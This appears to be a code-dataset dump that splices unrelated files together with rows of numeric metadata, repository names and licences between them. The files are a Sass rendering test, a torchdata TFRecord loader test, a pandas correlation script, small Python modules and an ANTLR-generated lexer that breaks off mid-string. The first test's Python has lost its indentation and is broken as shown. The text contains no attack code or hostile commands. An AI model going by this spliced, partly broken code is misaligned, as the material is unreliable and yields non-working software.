site = Site(url='https://example.org/')
site.add(out_location, sass(src_location))
site.generate(test_out)
assert (test_out / out_location).exists()
with open('expected/sass/nested/test1.css') as expected:
assert (test_out / 'css/nested/test1.css').read_text() == expected.read()
with open('expected/sass/nested/nested/test2.css') as expected:
assert (test_out / 'css/nested/nested/test2.css').read_text() == expected.read()
def test_nonexistent(tmp_path: Path):
src_location = 'resources/scss/test.scss'
site = Site(url='https://example.org/')
with pytest.raises(FileNotFoundError):
site.add('', sass(src_location))
def test_render_scss_file_sourcemaps(tmp_path: Path):
src_location = 'resources/scss/style.scss'
out_location = 'css/style.css'
test_out = tmp_path / 'out'
site = Site(url='https://example.org/')
site.add(out_location, sass(src_location))
site.generate(test_out)
with open('expected/scss/style.css.map') as expected:
assert (test_out / 'css/style.css.map').read_text() == expected.read()
def test_render_scss_directory_sourcemaps(tmp_path: Path):
src_location = 'resources/scss/styles'
out_location = 'css'
test_out = tmp_path / 'out'
site = Site(url='https://example.org/')
site.add(out_location, sass(src_location))
site.generate(test_out)
with open('expected/scss/nested/test1.css.map') as expected:
assert (test_out / 'css/test1.css.map').read_text() == expected.read()
with open('expected/scss/nested/nested/test2.css.map') as expected:
assert (test_out / 'css/nested/test2.css.map').read_text() == expected.read()
| 32.344086
| 88
| 0.68883
| 421
| 3,008
| 4.72209
| 0.104513
| 0.073944
| 0.071932
| 0.080483
| 0.92002
| 0.889336
| 0.839034
| 0.789738
| 0.732897
| 0.68662
| 0
| 0.004773
| 0.164229
| 3,008
| 92
| 89
| 32.695652
| 0.785998
| 0
| 0
| 0.580645
| 0
| 0
| 0.243351
| 0.15758
| 0
| 0
| 0
| 0
| 0.177419
| 1
| 0.096774
| false
| 0
| 0.048387
| 0
| 0.145161
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
186b2af41958aa0afec5b107c42fa3e4e7ed774c
| 12,883
|
py
|
Python
|
test/test_tfrecord.py
|
jkulhanek/torchdata
|
2e8b9f613a13c74b424651649f317c7b322131d6
|
[
"BSD-3-Clause"
] | null | null | null |
test/test_tfrecord.py
|
jkulhanek/torchdata
|
2e8b9f613a13c74b424651649f317c7b322131d6
|
[
"BSD-3-Clause"
] | null | null | null |
test/test_tfrecord.py
|
jkulhanek/torchdata
|
2e8b9f613a13c74b424651649f317c7b322131d6
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (c) Meta Platforms, Inc. and affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import os
import unittest
import warnings
from functools import partial
import expecttest
import numpy as np
import torch
from _utils._common_utils_for_test import reset_after_n_next_calls
from torchdata.datapipes.iter import (
FileLister,
FileOpener,
FSSpecFileLister,
FSSpecFileOpener,
FSSpecSaver,
IterableWrapper,
TFRecordLoader,
)
class TestDataPipeTFRecord(expecttest.TestCase):
def setUp(self):
self.temp_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), "_fakedata", "tfrecord")
def assertArrayEqual(self, arr1, arr2):
np.testing.assert_array_equal(arr1, arr2)
def _ground_truth_data(self):
for i in range(4):
x = torch.range(i * 10, (i + 1) * 10 - 1)
yield {
"x_float": x,
"x_int": (x * 10).long(),
"x_byte": [b"test str"],
}
def _ground_truth_seq_data(self):
for i in range(4):
x = torch.range(i * 10, (i + 1) * 10 - 1)
rep = 2 * i + 3
yield {"x_float": x, "x_int": (x * 10).long(), "x_byte": [b"test str"]}, {
"x_float_seq": [x] * rep,
"x_int_seq": [(x * 10).long()] * rep,
"x_byte_seq": [[b"test str"]] * rep,
}
@torch.no_grad()
def test_tfrecord_loader_example_iterdatapipe(self):
filename = f"{self.temp_dir}/example.tfrecord"
datapipe1 = IterableWrapper([filename])
datapipe2 = FileOpener(datapipe1, mode="b")
# Functional Test: test if the returned data is correct
tfrecord_parser = datapipe2.load_from_tfrecord()
result = list(tfrecord_parser)
self.assertEqual(len(result), 4)
expected_res = final_expected_res = list(self._ground_truth_data())
for true_data, loaded_data in zip(expected_res, result):
self.assertSetEqual(set(true_data.keys()), set(loaded_data.keys()))
for key in ["x_float", "x_int"]:
self.assertArrayEqual(true_data[key].numpy(), loaded_data[key].numpy())
self.assertEqual(len(loaded_data["x_byte"]), 1)
self.assertEqual(true_data["x_byte"][0], loaded_data["x_byte"][0])
# Functional Test: test if the shape of the returned data is correct when using spec
tfrecord_parser = datapipe2.load_from_tfrecord(
{
"x_float": ((5, 2), torch.float64),
"x_int": ((5, 2), torch.int32),
"x_byte": (tuple(), None),
}
)
result = list(tfrecord_parser)
self.assertEqual(len(result), 4)
expected_res = [
{
"x_float": x["x_float"].reshape(5, 2),
"x_int": x["x_int"].reshape(5, 2),
"x_byte": x["x_byte"][0],
}
for x in self._ground_truth_data()
]
for true_data, loaded_data in zip(expected_res, result):
self.assertSetEqual(set(true_data.keys()), set(loaded_data.keys()))
self.assertArrayEqual(true_data["x_float"].numpy(), loaded_data["x_float"].float().numpy())
self.assertArrayEqual(true_data["x_int"].numpy(), loaded_data["x_int"].long().numpy())
self.assertEqual(loaded_data["x_float"].dtype, torch.float64)
self.assertEqual(loaded_data["x_int"].dtype, torch.int32)
self.assertEqual(true_data["x_byte"], loaded_data["x_byte"])
# Functional Test: ignore features missing from spec
tfrecord_parser = datapipe2.load_from_tfrecord(
{
"x_float": ((10,), torch.float32),
}
)
result = list(tfrecord_parser)
self.assertEqual(len(result), 4)
expected_res = [
{
"x_float": x["x_float"],
}
for x in self._ground_truth_data()
]
for true_data, loaded_data in zip(expected_res, result):
self.assertSetEqual(set(true_data.keys()), set(loaded_data.keys()))
self.assertArrayEqual(true_data["x_float"].numpy(), loaded_data["x_float"].float().numpy())
# Functional Test: raises error if missing spec feature
with self.assertRaises(RuntimeError):
tfrecord_parser = datapipe2.load_from_tfrecord(
{
"x_float_unknown": ((5, 2), torch.float64),
"x_int": ((5, 2), torch.int32),
"x_byte": (tuple(), None),
}
)
result = list(tfrecord_parser)
# Reset Test:
tfrecord_parser = TFRecordLoader(datapipe2)
expected_res = final_expected_res
n_elements_before_reset = 2
res_before_reset, res_after_reset = reset_after_n_next_calls(tfrecord_parser, n_elements_before_reset)
self.assertEqual(len(expected_res[:n_elements_before_reset]), len(res_before_reset))
for true_data, loaded_data in zip(expected_res[:n_elements_before_reset], res_before_reset):
self.assertSetEqual(set(true_data.keys()), set(loaded_data.keys()))
for key in ["x_float", "x_int"]:
self.assertArrayEqual(true_data[key].numpy(), loaded_data[key].numpy())
self.assertEqual(true_data["x_byte"][0], loaded_data["x_byte"][0])
self.assertEqual(len(expected_res), len(res_after_reset))
for true_data, loaded_data in zip(expected_res, res_after_reset):
self.assertSetEqual(set(true_data.keys()), set(loaded_data.keys()))
for key in ["x_float", "x_int"]:
self.assertArrayEqual(true_data[key].numpy(), loaded_data[key].numpy())
self.assertEqual(true_data["x_byte"][0], loaded_data["x_byte"][0])
# __len__ Test: length isn't implemented since it cannot be known ahead of time
with self.assertRaisesRegex(TypeError, "doesn't have valid length"):
len(tfrecord_parser)
@torch.no_grad()
def test_tfrecord_loader_sequence_example_iterdatapipe(self):
filename = f"{self.temp_dir}/sequence_example.tfrecord"
datapipe1 = IterableWrapper([filename])
datapipe2 = FileOpener(datapipe1, mode="b")
# Functional Test: test if the returned data is correct
tfrecord_parser = datapipe2.load_from_tfrecord()
result = list(tfrecord_parser)
self.assertEqual(len(result), 4)
expected_res = final_expected_res = list(self._ground_truth_seq_data())
for (true_data_ctx, true_data_seq), loaded_data in zip(expected_res, result):
self.assertSetEqual(set(true_data_ctx.keys()).union(true_data_seq.keys()), set(loaded_data.keys()))
for key in ["x_float", "x_int"]:
self.assertArrayEqual(true_data_ctx[key].numpy(), loaded_data[key].numpy())
self.assertEqual(len(true_data_seq[key + "_seq"]), len(loaded_data[key + "_seq"]))
self.assertIsInstance(loaded_data[key + "_seq"], list)
for a1, a2 in zip(true_data_seq[key + "_seq"], loaded_data[key + "_seq"]):
self.assertArrayEqual(a1, a2)
self.assertEqual(true_data_ctx["x_byte"], loaded_data["x_byte"])
self.assertListEqual(true_data_seq["x_byte_seq"], loaded_data["x_byte_seq"])
# Functional Test: test if the shape of the returned data is correct when using spec
tfrecord_parser = datapipe2.load_from_tfrecord(
{
"x_float": ((5, 2), torch.float64),
"x_int": ((5, 2), torch.int32),
"x_byte": (tuple(), None),
"x_float_seq": ((-1, 5, 2), torch.float64),
"x_int_seq": ((-1, 5, 2), torch.int32),
"x_byte_seq": ((-1,), None),
}
)
result = list(tfrecord_parser)
self.assertEqual(len(result), 4)
expected_res = [
(
{
"x_float": x["x_float"].reshape(5, 2),
"x_int": x["x_int"].reshape(5, 2),
"x_byte": x["x_byte"][0],
},
{
"x_float_seq": [y.reshape(5, 2).numpy() for y in z["x_float_seq"]],
"x_int_seq": [y.reshape(5, 2).numpy() for y in z["x_int_seq"]],
"x_byte_seq": [y[0] for y in z["x_byte_seq"]],
},
)
for x, z in self._ground_truth_seq_data()
]
for (true_data_ctx, true_data_seq), loaded_data in zip(expected_res, result):
self.assertSetEqual(set(true_data_ctx.keys()).union(true_data_seq.keys()), set(loaded_data.keys()))
for key in ["x_float", "x_int"]:
l_loaded_data = loaded_data[key]
if key == "x_float":
l_loaded_data = l_loaded_data.float()
else:
l_loaded_data = l_loaded_data.int()
self.assertArrayEqual(true_data_ctx[key].numpy(), l_loaded_data.numpy())
self.assertArrayEqual(true_data_seq[key + "_seq"], loaded_data[key + "_seq"])
self.assertEqual(true_data_ctx["x_byte"], loaded_data["x_byte"])
self.assertListEqual(true_data_seq["x_byte_seq"], loaded_data["x_byte_seq"])
# Functional Test: ignore features missing from spec
tfrecord_parser = datapipe2.load_from_tfrecord(
{
"x_float": ((10,), torch.float32),
}
)
result = list(tfrecord_parser)
self.assertEqual(len(result), 4)
expected_res = [
{
"x_float": x["x_float"],
}
for x, z in self._ground_truth_seq_data()
]
for true_data, loaded_data in zip(expected_res, result):
self.assertSetEqual(set(true_data.keys()), set(loaded_data.keys()))
self.assertArrayEqual(true_data["x_float"].numpy(), loaded_data["x_float"].float().numpy())
# Functional Test: raises error if missing spec feature
with self.assertRaises(RuntimeError):
tfrecord_parser = datapipe2.load_from_tfrecord(
{"x_float_unknown": ((5, 2), torch.float64), "x_int": ((5, 2), torch.int32), "x_byte": None}
)
result = list(tfrecord_parser)
# Reset Test:
tfrecord_parser = TFRecordLoader(datapipe2)
expected_res = final_expected_res
n_elements_before_reset = 2
res_before_reset, res_after_reset = reset_after_n_next_calls(tfrecord_parser, n_elements_before_reset)
self.assertEqual(len(expected_res[:n_elements_before_reset]), len(res_before_reset))
for (true_data_ctx, true_data_seq), loaded_data in zip(
expected_res[:n_elements_before_reset], res_before_reset
):
self.assertSetEqual(set(true_data_ctx.keys()).union(true_data_seq.keys()), set(loaded_data.keys()))
for key in ["x_float", "x_int"]:
self.assertArrayEqual(true_data_ctx[key].numpy(), loaded_data[key].numpy())
self.assertEqual(len(true_data_seq[key + "_seq"]), len(loaded_data[key + "_seq"]))
self.assertIsInstance(loaded_data[key + "_seq"], list)
for a1, a2 in zip(true_data_seq[key + "_seq"], loaded_data[key + "_seq"]):
self.assertArrayEqual(a1, a2)
self.assertEqual(true_data_ctx["x_byte"], loaded_data["x_byte"])
self.assertListEqual(true_data_seq["x_byte_seq"], loaded_data["x_byte_seq"])
self.assertEqual(len(expected_res), len(res_after_reset))
for (true_data_ctx, true_data_seq), loaded_data in zip(expected_res, res_after_reset):
self.assertSetEqual(set(true_data_ctx.keys()).union(true_data_seq.keys()), set(loaded_data.keys()))
for key in ["x_float", "x_int"]:
self.assertArrayEqual(true_data_ctx[key].numpy(), loaded_data[key].numpy())
self.assertEqual(len(true_data_seq[key + "_seq"]), len(loaded_data[key + "_seq"]))
self.assertIsInstance(loaded_data[key + "_seq"], list)
for a1, a2 in zip(true_data_seq[key + "_seq"], loaded_data[key + "_seq"]):
self.assertArrayEqual(a1, a2)
self.assertEqual(true_data_ctx["x_byte"], loaded_data["x_byte"])
self.assertListEqual(true_data_seq["x_byte_seq"], loaded_data["x_byte_seq"])
# __len__ Test: length isn't implemented since it cannot be known ahead of time
with self.assertRaisesRegex(TypeError, "doesn't have valid length"):
len(tfrecord_parser)
if __name__ == "__main__":
unittest.main()
| 46.847273
| 111
| 0.598463
| 1,616
| 12,883
| 4.46349
| 0.113243
| 0.085956
| 0.028975
| 0.027035
| 0.872175
| 0.852489
| 0.835575
| 0.826702
| 0.808956
| 0.80854
| 0
| 0.014863
| 0.274082
| 12,883
| 274
| 112
| 47.018248
| 0.756416
| 0.066832
| 0
| 0.564655
| 0
| 0
| 0.078057
| 0.006081
| 0
| 0
| 0
| 0
| 0.267241
| 1
| 0.025862
| false
| 0
| 0.038793
| 0
| 0.068966
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
188303be89e27356e2870e46d7fec182b911169d
| 96
|
py
|
Python
|
venv/lib/python3.8/site-packages/zipp.py
|
Retraces/UkraineBot
|
3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71
|
[
"MIT"
] | 2
|
2022-03-13T01:58:52.000Z
|
2022-03-31T06:07:54.000Z
|
venv/lib/python3.8/site-packages/zipp.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | null | null | null |
venv/lib/python3.8/site-packages/zipp.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | null | null | null |
/home/runner/.cache/pip/pool/c0/c4/a8/6310083e0627a89016d09700979b16688705739c64ddd3637fa1251a05
| 96
| 96
| 0.895833
| 9
| 96
| 9.555556
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.520833
| 0
| 96
| 1
| 96
| 96
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
43fed542a413270455edceb8b9985b3db7da3f9a
| 3,477
|
py
|
Python
|
scripts/results/mcc_hpe_adl.py
|
Ayushk4/nmt-difficulty
|
d4c8252abf091701a2ba4d85fb6a79a3720d9748
|
[
"MIT"
] | 8
|
2020-05-06T09:47:55.000Z
|
2022-02-26T07:36:28.000Z
|
scripts/results/mcc_hpe_adl.py
|
Ayushk4/nmt-difficulty
|
d4c8252abf091701a2ba4d85fb6a79a3720d9748
|
[
"MIT"
] | null | null | null |
scripts/results/mcc_hpe_adl.py
|
Ayushk4/nmt-difficulty
|
d4c8252abf091701a2ba4d85fb6a79a3720d9748
|
[
"MIT"
] | 1
|
2021-05-20T06:06:56.000Z
|
2021-05-20T06:06:56.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from scipy import stats
import pandas as pd
def get_correlations(df, name=None):
xs = df.values[:, 0]
ys = df.values[:, 1]
pearson_r, pearson_p = stats.pearsonr(xs, ys)
spearman_rho, spearman_p = stats.spearmanr(xs, ys)
if not name:
name = ''
print(name, '\t', '%.4f' % pearson_r, '(%.4f)'% pearson_p, '\t', '%.4f' % spearman_rho, '(%.4f)' % spearman_p)
xmi = pd.read_csv("../../results/test/xmi.mt.csv").set_index(["src", "tgt"]).rename(columns={"value":"xmi"})
mcc_tgt = pd.read_csv("../../results/features/mcc.csv").rename(columns={"lang": "tgt"}).set_index("tgt").rename(columns={"value":"metric_tgt"})
mcc_src = pd.read_csv("../../results/features/mcc.csv").rename(columns={"lang": "src"}).set_index("src").rename(columns={"value":"metric_src"})
xmi_mcc = xmi.merge(mcc_tgt, left_index=True, right_index=True).merge(mcc_src, left_index=True, right_index=True)
adl_tgt = pd.read_csv("../../results/features/adl.csv").rename(columns={"lang": "tgt"}).set_index("tgt").rename(columns={"value":"metric_tgt"})
adl_src = pd.read_csv("../../results/features/adl.csv").rename(columns={"lang": "src"}).set_index("src").rename(columns={"value":"metric_src"})
xmi_adl = xmi.merge(adl_tgt, left_index=True, right_index=True).merge(adl_src, left_index=True, right_index=True)
hpe_tgt = pd.read_csv("../../results/features/hpe.csv").rename(columns={"lang": "tgt"}).set_index("tgt").rename(columns={"value":"metric_tgt"})
hpe_src = pd.read_csv("../../results/features/hpe.csv").rename(columns={"lang": "src"}).set_index("src").rename(columns={"value":"metric_src"})
xmi_hpe = xmi.merge(hpe_tgt, left_index=True, right_index=True).merge(hpe_src, left_index=True, right_index=True)
print('Into En')
print('Distance\t Pearson\t\t Spearman')
get_correlations(xmi_mcc.loc[pd.IndexSlice[:, 'en'], ['xmi', 'metric_src']], name='MCC_src')
get_correlations(xmi_mcc.loc[pd.IndexSlice[:, 'en'], ['xmi', 'metric_tgt']], name='MCC_tgt')
get_correlations(xmi_adl.loc[pd.IndexSlice[:, 'en'], ['xmi', 'metric_src']], name='ADL_src')
get_correlations(xmi_adl.loc[pd.IndexSlice[:, 'en'], ['xmi', 'metric_tgt']], name='ADL_tgt')
get_correlations(xmi_hpe.loc[pd.IndexSlice[:, 'en'], ['xmi', 'metric_src']], name='HPE_src')
get_correlations(xmi_hpe.loc[pd.IndexSlice[:, 'en'], ['xmi', 'metric_tgt']], name='HPE_tgt')
print('From En')
print('Distance\t Pearson\t\t Spearman')
get_correlations(xmi_mcc.loc[pd.IndexSlice['en', :], ['xmi', 'metric_src']], name='MCC_src')
get_correlations(xmi_mcc.loc[pd.IndexSlice['en', :], ['xmi', 'metric_tgt']], name='MCC_tgt')
get_correlations(xmi_adl.loc[pd.IndexSlice['en', :], ['xmi', 'metric_src']], name='ADL_src')
get_correlations(xmi_adl.loc[pd.IndexSlice['en', :], ['xmi', 'metric_tgt']], name='ADL_tgt')
get_correlations(xmi_hpe.loc[pd.IndexSlice['en', :], ['xmi', 'metric_src']], name='HPE_src')
get_correlations(xmi_hpe.loc[pd.IndexSlice['en', :], ['xmi', 'metric_tgt']], name='HPE_tgt')
print('Both')
print('Distance\t Pearson\t\t Spearman')
get_correlations(xmi_mcc.loc[:, ['xmi', 'metric_src']], name='MCC_src')
get_correlations(xmi_mcc.loc[:, ['xmi', 'metric_tgt']], name='MCC_tgt')
get_correlations(xmi_adl.loc[:, ['xmi', 'metric_src']], name='ADL_src')
get_correlations(xmi_adl.loc[:, ['xmi', 'metric_tgt']], name='ADL_tgt')
get_correlations(xmi_hpe.loc[:, ['xmi', 'metric_src']], name='HPE_src')
get_correlations(xmi_hpe.loc[:, ['xmi', 'metric_tgt']], name='HPE_tgt')
| 59.948276
| 143
| 0.685361
| 534
| 3,477
| 4.222846
| 0.123596
| 0.126386
| 0.143681
| 0.090466
| 0.821729
| 0.821729
| 0.807982
| 0.76408
| 0.717517
| 0.717517
| 0
| 0.002167
| 0.070751
| 3,477
| 57
| 144
| 61
| 0.69576
| 0.012079
| 0
| 0.068182
| 0
| 0
| 0.259907
| 0.060897
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022727
| false
| 0
| 0.045455
| 0
| 0.068182
| 0.159091
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a1602e01e346e931356bab7a8154bf262de1e2ee
| 42
|
py
|
Python
|
parqser/web_component/__init__.py
|
ARQtty/parqser
|
2f4f9505544d718dc818d1d9177ac1394bfbb352
|
[
"MIT"
] | null | null | null |
parqser/web_component/__init__.py
|
ARQtty/parqser
|
2f4f9505544d718dc818d1d9177ac1394bfbb352
|
[
"MIT"
] | null | null | null |
parqser/web_component/__init__.py
|
ARQtty/parqser
|
2f4f9505544d718dc818d1d9177ac1394bfbb352
|
[
"MIT"
] | null | null | null |
from .base_component import BaseComponent
| 21
| 41
| 0.880952
| 5
| 42
| 7.2
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095238
| 42
| 1
| 42
| 42
| 0.947368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a16425a64319b700eaebabdcf78c07fa92f8d5b4
| 120
|
py
|
Python
|
mala/common/__init__.py
|
DanielKotik/mala
|
1b89a78f5ddecb1df21d2753715001ffe4250fc1
|
[
"BSD-3-Clause"
] | null | null | null |
mala/common/__init__.py
|
DanielKotik/mala
|
1b89a78f5ddecb1df21d2753715001ffe4250fc1
|
[
"BSD-3-Clause"
] | null | null | null |
mala/common/__init__.py
|
DanielKotik/mala
|
1b89a78f5ddecb1df21d2753715001ffe4250fc1
|
[
"BSD-3-Clause"
] | null | null | null |
"""General functions for MALA, such as parameters."""
from .parameters import Parameters
from .printout import printout
| 30
| 53
| 0.791667
| 15
| 120
| 6.333333
| 0.666667
| 0.294737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 120
| 3
| 54
| 40
| 0.904762
| 0.391667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.5
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 6
|
a181539b6b4056078e2d1a8af2c0f216f66bab67
| 254
|
py
|
Python
|
globals/api/test/api/src/service/MyIgnorableService.py
|
SamuelJansen/Globals
|
49a5ac10b18642ffbc54745c9bd55bf358ca73df
|
[
"MIT"
] | 2
|
2020-07-03T06:35:39.000Z
|
2020-07-23T00:25:45.000Z
|
globals/api/test/api/src/service/MyIgnorableService.py
|
SamuelJansen/Globals
|
49a5ac10b18642ffbc54745c9bd55bf358ca73df
|
[
"MIT"
] | 1
|
2021-05-26T20:35:05.000Z
|
2021-06-12T06:50:30.000Z
|
globals/api/test/api/src/service/MyIgnorableService.py
|
SamuelJansen/Globals
|
49a5ac10b18642ffbc54745c9bd55bf358ca73df
|
[
"MIT"
] | 1
|
2020-11-01T02:07:34.000Z
|
2020-11-01T02:07:34.000Z
|
class MyIgnorableClass :
def getServiceValue(self, argument) :
return f'ignorable service value: {argument}'
class MyOtherIgnorableClass :
def getServiceValue(self, argument) :
return f'other ignorable service value: {argument}'
| 31.75
| 59
| 0.724409
| 25
| 254
| 7.36
| 0.52
| 0.195652
| 0.23913
| 0.326087
| 0.402174
| 0.402174
| 0
| 0
| 0
| 0
| 0
| 0
| 0.19685
| 254
| 7
| 60
| 36.285714
| 0.901961
| 0
| 0
| 0.333333
| 0
| 0
| 0.299213
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 6
|
a19918e7f152cf988f179485330dbf82cfb838f2
| 21,978
|
py
|
Python
|
src/pycropml/transpiler/antlr_py/grammars/RLexer.py
|
brichet/PyCrop2ML
|
7177996f72a8d95fdbabb772a16f1fd87b1d033e
|
[
"MIT"
] | 5
|
2020-06-21T18:58:04.000Z
|
2022-01-29T21:32:28.000Z
|
src/pycropml/transpiler/antlr_py/grammars/RLexer.py
|
brichet/PyCrop2ML
|
7177996f72a8d95fdbabb772a16f1fd87b1d033e
|
[
"MIT"
] | 27
|
2018-12-04T15:35:44.000Z
|
2022-03-11T08:25:03.000Z
|
src/pycropml/transpiler/antlr_py/grammars/RLexer.py
|
brichet/PyCrop2ML
|
7177996f72a8d95fdbabb772a16f1fd87b1d033e
|
[
"MIT"
] | 7
|
2019-04-20T02:25:22.000Z
|
2021-11-04T07:52:35.000Z
|
# Generated from Documents\THESE\pycropml_pheno\src\pycropml\antlr_grammarV4\r\R.g4 by ANTLR 4.8
from antlr4 import *
from io import StringIO
from typing.io import TextIO
import sys
def serializedATN():
with StringIO() as buf:
buf.write("\3\u608b\ua72a\u8133\ub9ed\u417c\u3be7\u7786\u5964\2B")
buf.write("\u0215\b\1\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4\7")
buf.write("\t\7\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r\t\r")
buf.write("\4\16\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22\t\22\4\23")
buf.write("\t\23\4\24\t\24\4\25\t\25\4\26\t\26\4\27\t\27\4\30\t\30")
buf.write("\4\31\t\31\4\32\t\32\4\33\t\33\4\34\t\34\4\35\t\35\4\36")
buf.write("\t\36\4\37\t\37\4 \t \4!\t!\4\"\t\"\4#\t#\4$\t$\4%\t%")
buf.write("\4&\t&\4\'\t\'\4(\t(\4)\t)\4*\t*\4+\t+\4,\t,\4-\t-\4.")
buf.write("\t.\4/\t/\4\60\t\60\4\61\t\61\4\62\t\62\4\63\t\63\4\64")
buf.write("\t\64\4\65\t\65\4\66\t\66\4\67\t\67\48\t8\49\t9\4:\t:")
buf.write("\4;\t;\4<\t<\4=\t=\4>\t>\4?\t?\4@\t@\4A\tA\4B\tB\4C\t")
buf.write("C\4D\tD\4E\tE\4F\tF\4G\tG\4H\tH\4I\tI\4J\tJ\3\2\3\2\3")
buf.write("\3\3\3\3\3\3\4\3\4\3\5\3\5\3\6\3\6\3\6\3\7\3\7\3\7\3\7")
buf.write("\3\b\3\b\3\t\3\t\3\n\3\n\3\13\3\13\3\f\3\f\3\r\3\r\3\16")
buf.write("\3\16\3\17\3\17\3\20\3\20\3\21\3\21\3\21\3\22\3\22\3\23")
buf.write("\3\23\3\23\3\24\3\24\3\24\3\25\3\25\3\25\3\26\3\26\3\27")
buf.write("\3\27\3\30\3\30\3\30\3\31\3\31\3\32\3\32\3\32\3\33\3\33")
buf.write("\3\34\3\34\3\34\3\35\3\35\3\35\3\35\3\36\3\36\3\37\3\37")
buf.write("\3\37\3 \3 \3 \3 \3!\3!\3!\3\"\3\"\3\"\3\"\3\"\3\"\3\"")
buf.write("\3\"\3\"\3#\3#\3$\3$\3%\3%\3&\3&\3\'\3\'\3\'\3(\3(\3(")
buf.write("\3(\3(\3)\3)\3)\3)\3*\3*\3*\3+\3+\3+\3+\3+\3+\3,\3,\3")
buf.write(",\3,\3,\3,\3,\3-\3-\3.\3.\3.\3.\3.\3/\3/\3/\3/\3/\3/\3")
buf.write("\60\3\60\3\60\3\60\3\60\3\61\3\61\3\61\3\62\3\62\3\62")
buf.write("\3\62\3\63\3\63\3\63\3\63\3\64\3\64\3\64\3\64\3\64\3\65")
buf.write("\3\65\3\65\3\65\3\65\3\65\3\66\3\66\3\67\3\67\3\67\3\67")
buf.write("\38\38\39\39\39\69\u0147\n9\r9\169\u0148\39\59\u014c\n")
buf.write("9\3:\6:\u014f\n:\r:\16:\u0150\3:\5:\u0154\n:\3;\3;\3<")
buf.write("\6<\u0159\n<\r<\16<\u015a\3<\3<\7<\u015f\n<\f<\16<\u0162")
buf.write("\13<\3<\5<\u0165\n<\3<\5<\u0168\n<\3<\6<\u016b\n<\r<\16")
buf.write("<\u016c\3<\5<\u0170\n<\3<\5<\u0173\n<\3<\3<\6<\u0177\n")
buf.write("<\r<\16<\u0178\3<\5<\u017c\n<\3<\5<\u017f\n<\5<\u0181")
buf.write("\n<\3=\3=\3>\3>\5>\u0187\n>\3>\3>\3?\3?\3?\3?\3?\3?\5")
buf.write("?\u0191\n?\3@\3@\3@\7@\u0196\n@\f@\16@\u0199\13@\3@\3")
buf.write("@\3@\3@\7@\u019f\n@\f@\16@\u01a2\13@\3@\3@\3@\3@\7@\u01a8")
buf.write("\n@\f@\16@\u01ab\13@\3@\5@\u01ae\n@\3A\3A\3A\3A\3A\5A")
buf.write("\u01b5\nA\3B\3B\3B\3B\3B\3B\3B\3B\3B\3B\3B\3B\3B\3B\3")
buf.write("B\3B\5B\u01c7\nB\3C\3C\3C\3C\3C\3C\3C\3C\3C\5C\u01d2\n")
buf.write("C\3D\3D\3D\5D\u01d7\nD\3E\3E\3E\5E\u01dc\nE\3E\3E\3E\7")
